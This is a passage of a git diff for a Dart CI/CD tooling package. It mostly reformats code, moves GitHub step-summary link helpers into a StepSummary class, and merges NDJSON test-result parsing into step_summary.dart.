(!incoming.existsSync()) { _warn('No incoming audit trails found at $incomingDir'); @@ -2588,8 +2884,14 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { // Create the merged run directory with a unique timestamp final now = DateTime.now(); - final timestamp = now.toIso8601String().replaceAll(':', '-').replaceAll('.', '-').substring(0, 19); - final outputPath = outputDir.startsWith('/') ? outputDir : '$repoRoot/$outputDir'; + final timestamp = now + .toIso8601String() + .replaceAll(':', '-') + .replaceAll('.', '-') + .substring(0, 19); + final outputPath = outputDir.startsWith('/') + ? outputDir + : '$repoRoot/$outputDir'; final mergedRunDir = '$outputPath/run_${timestamp}_merged'; Directory(mergedRunDir).createSync(recursive: true); @@ -2621,10 +2923,15 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (fileName == 'meta.json') { // Collect source meta for the merged meta.json try { - final meta = json.decode(child.readAsStringSync()) as Map; + final meta = + json.decode(child.readAsStringSync()) + as Map; sources.add({'artifact': artifactName, ...meta}); } catch (_) { - sources.add({'artifact': artifactName, 'error': 'failed to parse meta.json'}); + sources.add({ + 'artifact': artifactName, + 'error': 'failed to parse meta.json', + }); } } } @@ -2650,9 +2957,13 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { 'platform': Platform.operatingSystem, 'dart_version': Platform.version.split(' ').first, }; - File('$mergedRunDir/meta.json').writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n'); + File('$mergedRunDir/meta.json').writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n', + ); - _success('Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)'); + _success( + 'Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)', + ); } /// Recursively copy a directory tree. @@ -2782,7 +3093,9 @@ Future _installTree() async { } else if (Platform.isLinux) { _exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { - _info('tree is built-in on Windows (limited). For full tree: choco install tree'); + _info( + 'tree is built-in on Windows (limited). For full tree: choco install tree', + ); } } @@ -2791,7 +3104,10 @@ Future _installTree() async { // ═══════════════════════════════════════════════════════════════════════════════ String _detectPrevTag(String repoRoot) { - final result = _runSync("git tag -l 'v*' --sort=-version:refname | head -1", repoRoot); + final result = _runSync( + "git tag -l 'v*' --sort=-version:refname | head -1", + repoRoot, + ); if (result.isEmpty) { // No tags yet -- use the first commit (head -1 to handle multiple roots in monorepos) return _runSync('git rev-list --max-parents=0 HEAD | head -1', repoRoot); @@ -2800,7 +3116,10 @@ String _detectPrevTag(String repoRoot) { } String _detectNextVersion(String repoRoot, String prevTag) { - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); // Derive bump base from prevTag (not pubspec.yaml) to avoid stale-version collisions. final tagVersion = prevTag.startsWith('v') ? prevTag.substring(1) : prevTag; @@ -2819,11 +3138,20 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); - final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); + final commits = _runSync( + 'git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', + repoRoot, + ); + final commitSubjects = _runSync( + 'git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', + repoRoot, + ); var bump = 'patch'; - if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { + if (RegExp( + r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', + multiLine: true, + ).hasMatch(commits)) { bump = 'major'; } else if (RegExp(r'^feat(\(.+\))?:', multiLine: true).hasMatch(commits)) { bump = 'minor'; @@ -2831,7 +3159,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { commitSubjects .split('\n') .every( - (line) => line.trim().isEmpty || RegExp(r'^(chore|style|ci|docs|build)(\(.+\))?:').hasMatch(line.trim()), + (line) => + line.trim().isEmpty || + RegExp( + r'^(chore|style|ci|docs|build)(\(.+\))?:', + ).hasMatch(line.trim()), )) { // Only pure infra/docs/style/build commits with no code changes → no release. // fix:, test:, perf:, and refactor: all default to at least patch. @@ -2841,15 +3173,30 @@ String _detectNextVersion(String repoRoot, String prevTag) { _info(' Regex heuristic: $bump'); // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── - if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); - final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); - final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); + if (_commandExists('gemini') && + Platform.environment['GEMINI_API_KEY'] != null) { + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); + final changedFiles = _runSync( + 'git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', + repoRoot, + ); + final diffStat = _runSync( + 'git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', + repoRoot, + ); + final existingTags = _runSync( + "git tag -l 'v*' --sort=-version:refname | head -10", + repoRoot, + ); final commitSummary = commits.split('\n').take(50).join('\n'); // Create a version analysis output directory within the CWD (sandbox-safe) - final versionAnalysisDir = Directory('$repoRoot/$kCicdRunsDir/version_analysis'); + final versionAnalysisDir = Directory( + '$repoRoot/$kCicdRunsDir/version_analysis', + ); versionAnalysisDir.createSync(recursive: true); final bumpJsonPath = '${versionAnalysisDir.path}/version_bump.json'; final prompt = @@ -2902,15 +3249,27 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Save Gemini response for audit trail (strip MCP/warning prefix) if (geminiResult.isNotEmpty) { final jsonStart = geminiResult.indexOf('{'); - final cleaned = jsonStart > 0 ? geminiResult.substring(jsonStart) : geminiResult; - File('${versionAnalysisDir.path}/gemini_response.json').writeAsStringSync(cleaned); + final cleaned = jsonStart > 0 + ? geminiResult.substring(jsonStart) + : geminiResult; + File( + '${versionAnalysisDir.path}/gemini_response.json', + ).writeAsStringSync(cleaned); } if (geminiResult.isNotEmpty && File(bumpJsonPath).existsSync()) { try { - final bumpData = json.decode(File(bumpJsonPath).readAsStringSync()) as Map; - final rawBump = (bumpData['bump'] as String?)?.trim().toLowerCase().replaceAll(RegExp(r'[^a-z]'), ''); - if (rawBump == 'major' || rawBump == 'minor' || rawBump == 'patch' || rawBump == 'none') { + final bumpData = + json.decode(File(bumpJsonPath).readAsStringSync()) + as Map; + final rawBump = (bumpData['bump'] as String?) + ?.trim() + .toLowerCase() + .replaceAll(RegExp(r'[^a-z]'), ''); + if (rawBump == 'major' || + rawBump == 'minor' || + rawBump == 'patch' || + rawBump == 'none') { _info(' Gemini analysis: $rawBump (overriding regex: $bump)'); bump = rawBump!; } else { @@ -2949,7 +3308,9 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Guard: ensure version never goes backward from what pubspec.yaml already has if (_compareVersions(nextVersion, currentVersion) < 0) { - _warn('Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.'); + _warn( + 'Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.', + ); return currentVersion; } @@ -3031,13 +3392,19 @@ String _buildReleaseCommitMessage({ buf.writeln('## Changelog'); buf.writeln(); // Trim to first 2000 chars to keep commit message reasonable - buf.writeln(entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry); + buf.writeln( + entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry, + ); buf.writeln(); } } // Staged file summary - final stagedResult = Process.runSync('git', ['diff', '--cached', '--stat'], workingDirectory: repoRoot); + final stagedResult = Process.runSync('git', [ + 'diff', + '--cached', + '--stat', + ], workingDirectory: repoRoot); final stagedStat = (stagedResult.stdout as String).trim(); if (stagedStat.isNotEmpty) { buf.writeln('## Files Modified'); @@ -3055,7 +3422,11 @@ String _buildReleaseCommitMessage({ if (rationale.isNotEmpty) { buf.writeln('## Version Bump Rationale'); buf.writeln(); - buf.writeln(rationale.length > 1000 ? '${rationale.substring(0, 1000)}...' : rationale); + buf.writeln( + rationale.length > 1000 + ? '${rationale.substring(0, 1000)}...' + : rationale, + ); buf.writeln(); } } @@ -3083,9 +3454,14 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); buf.writeln('---'); - buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); + buf.writeln( + 'Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)', + ); buf.writeln('Commits since $prevTag: $commitCount'); buf.writeln('Generated: ${DateTime.now().toUtc().toIso8601String()}'); @@ -3104,7 +3480,10 @@ bool _commandExists(String command) { String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); - final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); + final result = Process.runSync('sh', [ + '-c', + command, + ], workingDirectory: workingDirectory); final output = (result.stdout as String).trim(); if (_verbose && output.isNotEmpty) _info(' $output'); return output; @@ -3113,44 +3492,29 @@ String _runSync(String command, String workingDirectory) { /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). void _writeStepSummary(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); - } + StepSummary.write(markdown); } // ── Step Summary Helpers ───────────────────────────────────────────────────── /// Build a link to the current workflow run's artifacts page. String _artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY']; - final runId = Platform.environment['GITHUB_RUN_ID']; - if (repo == null || runId == null) return ''; - return '[$label]($server/$repo/actions/runs/$runId)'; + return StepSummary.artifactLink(label); } /// Build a GitHub compare link between two refs. String _compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - final text = label ?? '$prevTag...$newTag'; - return '[$text]($server/$repo/compare/$prevTag...$newTag)'; + return StepSummary.compareLink(prevTag, newTag, label); } /// Build a link to a file/path in the repository. String _ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; - return '[$label]($server/$repo/blob/$sha/$path)'; + return StepSummary.ghLink(label, path); } /// Build a link to a GitHub Release by tag. String _releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - return '[v$tag]($server/$repo/releases/tag/$tag)'; + return StepSummary.releaseLink(tag); } /// Add Keep a Changelog reference-style links to the bottom of CHANGELOG.md. @@ -3162,8 +3526,11 @@ String _releaseLink(String tag) { /// ``` /// Idempotent: replaces any existing reference-link block. void _addChangelogReferenceLinks(String repoRoot, String content) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; // Extract all version headers: ## [X.Y.Z] (skip any [Unreleased] entries) final versionPattern = RegExp(r'^## \[([^\]]+)\]', multiLine: true); @@ -3171,7 +3538,10 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (matches.isEmpty) return; - final versions = matches.map((m) => m.group(1)!).where((v) => v != 'Unreleased').toList(); + final versions = matches + .map((m) => m.group(1)!) + .where((v) => v != 'Unreleased') + .toList(); if (versions.isEmpty) return; @@ -3182,7 +3552,9 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (i + 1 < versions.length) { // Compare from previous version final prevVersion = versions[i + 1]; - links.writeln('[$version]: $server/$repo/compare/v$prevVersion...v$version'); + links.writeln( + '[$version]: $server/$repo/compare/v$prevVersion...v$version', + ); } else { // Oldest version: link to the tag itself links.writeln('[$version]: $server/$repo/releases/tag/v$version'); @@ -3193,7 +3565,9 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (linksStr.isEmpty) return; // Strip any existing reference-link block (lines matching [X.Y.Z]: http...) - final existingLinksPattern = RegExp(r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$'); + final existingLinksPattern = RegExp( + r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$', + ); var cleaned = content.replaceAll(existingLinksPattern, ''); cleaned = cleaned.trimRight(); @@ -3205,9 +3579,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { /// Wrap content in a collapsible
block for step summaries. String _collapsible(String title, String content, {bool open = false}) { - if (content.trim().isEmpty) return ''; - final openAttr = open ? ' open' : ''; - return '\n\n$title\n\n$content\n\n
\n'; + return StepSummary.collapsible(title, content, open: open); } /// Read a file and return its content, or a fallback message if not found. @@ -3217,7 +3589,12 @@ String _readFileOr(String path, [String fallback = '(not available)']) { } /// Execute a command. Set [fatal] to true to exit on failure (default: false). -void _exec(String executable, List args, {String? cwd, bool fatal = false}) { +void _exec( + String executable, + List args, { + String? cwd, + bool fatal = false, +}) { if (_verbose) _info(' \$ $executable ${args.join(" ")}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { @@ -3228,7 +3605,9 @@ void _exec(String executable, List args, {String? cwd, bool fatal = fals void _requireGeminiCli() { if (!_commandExists('gemini')) { - _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); + _error( + 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', + ); exit(1); } } @@ -3237,7 +3616,9 @@ void _requireApiKey() { final key = Platform.environment['GEMINI_API_KEY']; if (key == null || key.isEmpty) { _error('GEMINI_API_KEY is not set.'); - _error('Set it via: export GEMINI_API_KEY='); + _error( + 'Set it via: export GEMINI_API_KEY=', + ); exit(1); } } @@ -3250,7 +3631,9 @@ bool _geminiAvailable({bool warnOnly = false}) { _warn('Gemini CLI not installed — skipping Gemini-powered step.'); return false; } - _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); + _error( + 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', + ); exit(1); } final key = Platform.environment['GEMINI_API_KEY']; @@ -3354,9 +3737,15 @@ Future _runInit(String repoRoot) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); if (pubspecFile.existsSync()) { final content = pubspecFile.readAsStringSync(); - final nameMatch = RegExp(r'^name:\s*(\S+)', multiLine: true).firstMatch(content); + final nameMatch = RegExp( + r'^name:\s*(\S+)', + multiLine: true, + ).firstMatch(content); if (nameMatch != null) packageName = nameMatch.group(1)!; - final versionMatch = RegExp(r'^version:\s*(\S+)', multiLine: true).firstMatch(content); + final versionMatch = RegExp( + r'^version:\s*(\S+)', + multiLine: true, + ).firstMatch(content); if (versionMatch != null) packageVersion = versionMatch.group(1)!; _success('Detected package: $packageName v$packageVersion'); } else { @@ -3385,7 +3774,11 @@ Future _runInit(String repoRoot) async { if (repoOwner == 'unknown') { // Fallback: try parsing git remote try { - final gitResult = Process.runSync('git', ['remote', 'get-url', 'origin'], workingDirectory: repoRoot); + final gitResult = Process.runSync('git', [ + 'remote', + 'get-url', + 'origin', + ], workingDirectory: repoRoot); if (gitResult.exitCode == 0) { final url = (gitResult.stdout as String).trim(); // git@github.com:owner/repo.git or https://github.com/owner/repo.git @@ -3441,7 +3834,12 @@ Future _runInit(String repoRoot) async { 'release_notes_path': '$kReleaseNotesDir', }, 'gcp': {'project': ''}, - 'sentry': {'organization': '', 'projects': [], 'scan_on_pre_release': false, 'recent_errors_hours': 168}, + 'sentry': { + 'organization': '', + 'projects': [], + 'scan_on_pre_release': false, + 'recent_errors_hours': 168, + }, 'release': { 'pre_release_scan_sentry': false, 'pre_release_scan_github': true, @@ -3460,13 +3858,25 @@ Future _runInit(String repoRoot) async { }, }, 'labels': { - 'type': ['bug', 'feature-request', 'enhancement', 'documentation', 'question'], + 'type': [ + 'bug', + 'feature-request', + 'enhancement', + 'documentation', + 'question', + ], 'priority': ['P0-critical', 'P1-high', 'P2-medium', 'P3-low'], 'area': areaLabels, }, 'thresholds': {'auto_close': 0.9, 'suggest_close': 0.7, 'comment': 0.5}, 'agents': { - 'enabled': ['code_analysis', 'pr_correlation', 'duplicate', 'sentiment', 'changelog'], + 'enabled': [ + 'code_analysis', + 'pr_correlation', + 'duplicate', + 'sentiment', + 'changelog', + ], 'conditional': { 'changelog': {'require_file': 'CHANGELOG.md'}, }, @@ -3486,7 +3896,9 @@ Future _runInit(String repoRoot) async { }, }; - configFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(configData)}\n'); + configFile.writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(configData)}\n', + ); _success('Created $kConfigFileName'); } else { _info('$kConfigFileName already exists (kept as-is)'); @@ -3511,12 +3923,16 @@ Future _runInit(String repoRoot) async { if (gitignoreFile.existsSync()) { final content = gitignoreFile.readAsStringSync(); if (!content.contains('.runtime_ci/runs/')) { - gitignoreFile.writeAsStringSync('$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); + gitignoreFile.writeAsStringSync( + '$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', + ); _success('Added .runtime_ci/runs/ to .gitignore'); repaired++; } } else { - gitignoreFile.writeAsStringSync('# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); + gitignoreFile.writeAsStringSync( + '# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', + ); _success('Created .gitignore with .runtime_ci/runs/'); repaired++; } @@ -3539,7 +3955,9 @@ Future _runInit(String repoRoot) async { print(''); if (!configExists) { _info('Next steps:'); - _info(' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.'); + _info( + ' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.', + ); _info(' 2. Add runtime_ci_tooling as a dev_dependency in pubspec.yaml'); _info(' 3. Run: dart run runtime_ci_tooling:manage_cicd setup'); _info(' 4. Run: dart run runtime_ci_tooling:manage_cicd status'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 20f3568..763ae86 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,6 +1,35 @@ +import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; +import 'logger.dart'; + +/// A single failed test record parsed from the JSON reporter output. +class TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed aggregate test results from the NDJSON file reporter. +class TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List failures = []; + bool parsed = false; +} /// Step summary utilities for GitHub Actions. abstract final class StepSummary { @@ -15,7 +44,8 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; final repo = Platform.environment['GITHUB_REPOSITORY']; final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; @@ -24,24 +54,33 @@ abstract final class StepSummary { /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -54,6 +93,227 @@ abstract final class StepSummary { /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); + return input + .replaceAll('&', '&') + .replaceAll('<', '<') + .replaceAll('>', '>') + .replaceAll('"', '"'); + } + + /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. + static TestResults parseTestResultsJson(String jsonPath) { + final results = TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) + testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; + } + + /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. + static void writeTestJobSummary(TestResults results, int exitCode) { + final buf = StringBuffer(); + + final platformId = + Platform.environment['PLATFORM_ID'] ?? + Platform.environment['RUNNER_NAME'] ?? + Platform.operatingSystem; + + buf.writeln('## Test Results — ${escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln( + '> Tests $status (exit code $exitCode) — no structured results available.', + ); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(artifactLink(':package: View full test logs')); + write(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln( + ':x: ${escapeHtml(f.name)}$durStr', + ); + buf.writeln(); + + if (f.error.isNotEmpty) { + final error = f.error.length > 2000 + ? '${f.error.substring(0, 2000)}\n... (truncated)' + : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + final stack = f.stackTrace.length > 1500 + ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' + : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + final printPreview = trimmed.length > 1500 + ? '${trimmed.substring(0, 1500)}\n... (truncated)' + : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + buf.writeln('---'); + buf.writeln(artifactLink(':package: View full test logs')); + buf.writeln(); + + write(buf.toString()); + } + + static String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart deleted file mode 100644 index 5259e0b..0000000 --- a/lib/src/cli/utils/test_results_util.dart +++ /dev/null @@ -1,262 +0,0 @@ -import 'dart:convert'; -import 'dart:io'; - -import 'logger.dart'; -import 'step_summary.dart'; - -/// A single test failure with its error, stack trace, and captured print output. -class TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file produced by `--file-reporter json:`. -class TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. We track: -/// - `testStart`: register test name + start time -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace (accumulated per test) -/// - `print`: capture print output, attribute to testID -/// - `done`: overall total time -TestResults parseTestResultsJson(String jsonPath) { - final results = TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final 